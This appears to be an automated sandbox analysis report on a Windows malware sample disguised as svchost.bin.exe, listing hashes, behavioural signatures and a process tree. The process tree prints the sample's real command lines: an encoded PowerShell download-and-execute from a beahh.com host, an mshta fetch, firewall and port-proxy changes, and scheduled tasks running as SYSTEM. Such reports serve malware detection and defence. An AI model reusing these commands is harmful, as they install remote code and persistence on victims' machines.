Overview
overview
10Static
static
3svchost.bin.exe
windows7_x64
10svchost.bin.exe
windows7_x64
10svchost.bin.exe
windows7_x64
10svchost.bin.exe
windows7_x64
10svchost.bin.exe
windows11_x64
10svchost.bin.exe
windows10_x64
9svchost.bin.exe
windows10_x64
svchost.bin.exe
windows10_x64
10svchost.bin.exe
windows10_x64
10svchost.bin.exe
windows10_x64
10Analysis
-
max time kernel
1826s -
max time network
1830s -
platform
windows7_x64 -
resource
win7-jp -
submitted
04-09-2021 07:35
Static task
static1
Behavioral task
behavioral1
Sample
svchost.bin.exe
Resource
win7-jp
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
svchost.bin.exe
Resource
win7-fr
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
svchost.bin.exe
Resource
win7-en
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
svchost.bin.exe
Resource
win7-de
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral5
Sample
svchost.bin.exe
Resource
win11
windows11_x64
0 signatures
0 seconds
Behavioral task
behavioral6
Sample
svchost.bin.exe
Resource
win10-en
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral7
Sample
svchost.bin.exe
Resource
win10-jp
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral8
Sample
svchost.bin.exe
Resource
win10-fr
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral9
Sample
svchost.bin.exe
Resource
win10-en
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral10
Sample
svchost.bin.exe
Resource
win10-de
windows10_x64
0 signatures
0 seconds
General
-
Target
svchost.bin.exe
-
Size
6.6MB
-
MD5
2787bb2d1ab223f8ac2692f3a8fd85fc
-
SHA1
dc34ee4e46ddea333cdc90e4aad7589cb8ee1ea0
-
SHA256
952e3e059251cd41e3c67006c5aa4b75fe3e6b0f18d96554b2d60d4ccfb78cb4
-
SHA512
d79bd7599ccb09fa72b939a506d04e28cb958e59c3987ab4d375e76337d5b1e33369d59397338aaeaf938c14ec9d93b20501d5224d151631c69c874d0657e9f3
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 138979 2856 powershell.EXE -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 20 IoCs
pid Process 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe 1724 svchost.bin.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1416 schtasks.exe 848 schtasks.exe 1964 schtasks.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
pid Process 1612 ipconfig.exe 1748 ipconfig.exe 1132 netstat.exe -
Modifies data under HKEY_USERS 35 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0116c7661a1d701 powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft WScript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software WScript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{B155BDF8-02F0-451E-9A26-AE317CFD7779} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 01000000000000006096a22960a1d701 WScript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" cmd.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000a0d39d2960a1d701 WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached WScript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings WScript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" WScript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings WScript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WScript.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 1624 powershell.exe 2856 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 608 WMIC.exe Token: SeSecurityPrivilege 608 WMIC.exe Token: SeTakeOwnershipPrivilege 608 WMIC.exe Token: SeLoadDriverPrivilege 608 WMIC.exe Token: SeSystemProfilePrivilege 608 WMIC.exe Token: SeSystemtimePrivilege 608 WMIC.exe Token: SeProfSingleProcessPrivilege 608 WMIC.exe Token: SeIncBasePriorityPrivilege 608 WMIC.exe Token: SeCreatePagefilePrivilege 608 WMIC.exe Token: SeBackupPrivilege 608 WMIC.exe Token: SeRestorePrivilege 608 WMIC.exe Token: SeShutdownPrivilege 608 WMIC.exe Token: SeDebugPrivilege 608 WMIC.exe Token: SeSystemEnvironmentPrivilege 608 WMIC.exe Token: SeRemoteShutdownPrivilege 608 WMIC.exe Token: SeUndockPrivilege 608 WMIC.exe Token: SeManageVolumePrivilege 608 WMIC.exe Token: 33 608 WMIC.exe Token: 34 608 WMIC.exe Token: 35 608 WMIC.exe Token: SeIncreaseQuotaPrivilege 608 WMIC.exe Token: SeSecurityPrivilege 608 WMIC.exe Token: SeTakeOwnershipPrivilege 608 WMIC.exe Token: SeLoadDriverPrivilege 608 WMIC.exe Token: SeSystemProfilePrivilege 608 WMIC.exe Token: SeSystemtimePrivilege 608 WMIC.exe Token: SeProfSingleProcessPrivilege 608 WMIC.exe Token: SeIncBasePriorityPrivilege 608 WMIC.exe Token: SeCreatePagefilePrivilege 608 WMIC.exe Token: SeBackupPrivilege 608 WMIC.exe Token: SeRestorePrivilege 608 WMIC.exe Token: SeShutdownPrivilege 608 WMIC.exe Token: SeDebugPrivilege 608 WMIC.exe Token: SeSystemEnvironmentPrivilege 608 WMIC.exe Token: SeRemoteShutdownPrivilege 608 WMIC.exe Token: SeUndockPrivilege 608 WMIC.exe Token: SeManageVolumePrivilege 608 WMIC.exe Token: 33 608 WMIC.exe Token: 34 608 WMIC.exe Token: 35 608 WMIC.exe Token: SeDebugPrivilege 1624 powershell.exe Token: SeDebugPrivilege 1132 netstat.exe Token: SeDebugPrivilege 2856 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1932 wrote to memory of 1724 1932 svchost.bin.exe 27 PID 1932 wrote to memory of 1724 1932 svchost.bin.exe 27 PID 1932 wrote to memory of 1724 1932 svchost.bin.exe 27 PID 1932 wrote to memory of 1724 1932 svchost.bin.exe 27 PID 1724 wrote to memory of 792 1724 svchost.bin.exe 32 PID 1724 wrote to memory of 792 1724 svchost.bin.exe 32 PID 1724 wrote to memory of 792 1724 svchost.bin.exe 32 PID 1724 wrote to memory of 792 1724 svchost.bin.exe 32 PID 792 wrote to memory of 608 792 cmd.exe 33 PID 792 wrote to memory of 608 792 cmd.exe 33 PID 792 wrote to memory of 608 792 cmd.exe 33 PID 792 wrote to memory of 608 792 cmd.exe 33 PID 1724 wrote to memory of 1032 1724 svchost.bin.exe 35 PID 1724 wrote to memory of 1032 1724 svchost.bin.exe 35 PID 1724 wrote to memory of 1032 1724 svchost.bin.exe 35 PID 1724 wrote to memory of 1032 1724 svchost.bin.exe 35 PID 1032 wrote to memory of 896 1032 cmd.exe 36 PID 1032 wrote to memory of 896 1032 cmd.exe 36 PID 1032 wrote to memory of 896 1032 cmd.exe 36 PID 1032 wrote to memory of 896 1032 cmd.exe 36 PID 896 wrote to memory of 1540 896 net.exe 37 PID 896 wrote to memory of 1540 896 net.exe 37 PID 896 wrote to memory of 1540 896 net.exe 37 PID 896 wrote to memory of 1540 896 net.exe 37 PID 1724 wrote to memory of 1088 1724 svchost.bin.exe 38 PID 1724 wrote to memory of 1088 1724 svchost.bin.exe 38 PID 1724 wrote to memory of 1088 1724 svchost.bin.exe 38 PID 1724 wrote to memory of 1088 1724 svchost.bin.exe 38 PID 1088 wrote to memory of 1488 1088 cmd.exe 39 PID 1088 wrote to memory of 1488 1088 cmd.exe 39 PID 1088 wrote to memory of 1488 1088 cmd.exe 39 PID 1088 wrote to memory of 1488 1088 cmd.exe 39 PID 1488 wrote to memory of 1276 1488 net.exe 40 PID 1488 wrote to memory of 1276 1488 net.exe 40 PID 1488 wrote to memory of 1276 1488 net.exe 40 PID 1488 wrote to memory of 1276 1488 net.exe 40 PID 1724 wrote to memory of 1624 1724 svchost.bin.exe 41 PID 1724 wrote to memory of 1624 1724 svchost.bin.exe 41 PID 1724 wrote to memory of 1624 1724 svchost.bin.exe 41 PID 1724 wrote to memory of 1624 1724 svchost.bin.exe 41 PID 1724 wrote to memory of 1424 1724 svchost.bin.exe 42 PID 1724 wrote to memory of 1424 1724 svchost.bin.exe 42 PID 1724 wrote to memory of 1424 1724 svchost.bin.exe 42 PID 1724 wrote to memory of 1424 1724 svchost.bin.exe 42 PID 1424 wrote to memory of 1612 1424 cmd.exe 43 PID 1424 wrote to memory of 1612 1424 cmd.exe 43 PID 1424 wrote to memory of 1612 1424 cmd.exe 43 PID 1424 wrote to memory of 1612 1424 cmd.exe 43 PID 1724 wrote to memory of 1748 1724 svchost.bin.exe 44 PID 1724 wrote to memory of 1748 1724 svchost.bin.exe 44 PID 1724 wrote to memory of 1748 1724 svchost.bin.exe 44 PID 1724 wrote to memory of 1748 1724 svchost.bin.exe 44 PID 1724 wrote to memory of 1132 1724 svchost.bin.exe 45 PID 1724 wrote to memory of 1132 1724 svchost.bin.exe 45 PID 1724 wrote to memory of 1132 1724 svchost.bin.exe 45 PID 1724 wrote to memory of 1132 1724 svchost.bin.exe 45 PID 2760 wrote to memory of 1696 2760 jcgGYRwv.exe 47 PID 2760 wrote to memory of 1696 2760 jcgGYRwv.exe 47 PID 2760 wrote to memory of 1696 2760 jcgGYRwv.exe 47 PID 2760 wrote to memory of 1696 2760 jcgGYRwv.exe 47 PID 1696 wrote to memory of 1984 1696 cmd.exe 49 PID 1696 wrote to memory of 1984 1696 cmd.exe 49 PID 1696 wrote to memory of 1984 1696 cmd.exe 49 PID 1696 wrote to memory of 1984 1696 cmd.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"C:\Users\Admin\AppData\Local\Temp\svchost.bin.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\cmd.execmd /c wmic ntdomain get domainname3⤵
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ntdomain get domainname4⤵
- Suspicious use of AdjustPrivilegeToken
PID:608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\net.exenet localgroup administrators4⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators5⤵PID:1540
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net group "domain admins" /domain3⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\SysWOW64\net.exenet group "domain admins" /domain4⤵
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 group "domain admins" /domain5⤵PID:1276
-
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /all3⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:1612
-
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all3⤵
- Gathers network information
PID:1748
-
-
C:\Windows\SysWOW64\netstat.exenetstat -na3⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
-
C:\Windows\jcgGYRwv.exeC:\Windows\jcgGYRwv.exe1⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\SysWOW64\cmd.execmd /c call "c:\windows\temp\tmp.vbs"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"3⤵
- Modifies data under HKEY_USERS
PID:1984 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo xbfgK >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\VhgNYK.exe&move /y c:\windows\temp\dig.exe c:\windows\ZovlTo.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn VhgNYK /tr "C:\Windows\VhgNYK.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\tdjwjuq" /tr "c:\windows\ZovlTo.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pKJUCCLUP"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\ZovlTo.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\VhgNYK.exe"&schtasks /run /TN escan)4⤵PID:2356
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 65533 DNSd5⤵
- Modifies data under HKEY_USERS
PID:2472
-
-
C:\Windows\SysWOW64\netsh.exenetsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=535⤵
- Modifies data under HKEY_USERS
PID:2428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F5⤵
- Creates scheduled task(s)
PID:1964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn VhgNYK /tr "C:\Windows\VhgNYK.exe" /F5⤵
- Creates scheduled task(s)
PID:1416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\tdjwjuq" /tr "c:\windows\ZovlTo.exe" /F5⤵
- Creates scheduled task(s)
PID:848
-
-
-
-
-
C:\Windows\FNEhStrW.exeC:\Windows\FNEhStrW.exe1⤵PID:2468
-
C:\Windows\system32\taskeng.exetaskeng.exe {A76AC7F8-D501-46F8-B2E1-959EC87B16DB} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2712
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856
-